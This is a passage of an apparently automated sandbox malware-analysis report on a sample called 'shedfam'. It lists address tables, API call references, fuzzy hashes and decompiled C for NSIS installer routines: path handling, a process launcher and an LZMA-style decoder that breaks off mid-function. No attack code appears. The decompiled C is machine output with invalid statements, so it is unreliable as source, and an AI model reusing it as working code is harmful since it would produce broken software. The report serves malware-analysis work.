0x004058e6
0x004058ea
0x004058f1
0x004058fd
0x00405909
0x00405909
0x00405921
0x00405922
0x00405929
0x0040592a
0x00000000
0x00000000
0x0040590d
0x00405914
0x0040591c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405914
0x0040592c
0x00405932
0x00000000
0x00405940
0x004058ff
0x00405903
0x00000000
0x00000000
0x00000000
0x00000000
0x00405903
0x004058ec
0x00000000

APIs

Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08

Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405890
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405922
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405932

Strings

C:\, xrefs: 004058D5, 004058DA, 004058E0, 0040591B, 00405921, 00405929, 00405931

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E

Uniqueness

Uniqueness Score: -1.00%

Function 0040555B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040555B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422588->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405564
0x00405580
0x00405588
0x0040558d
0x00000000
0x00405593
0x00405597

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
CloseHandle.KERNEL32(?), ref: 0040558D

Strings

Error launching installer, xrefs: 0040556E

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69

Uniqueness

Uniqueness Score: -1.00%

Function 00406768 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406768() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
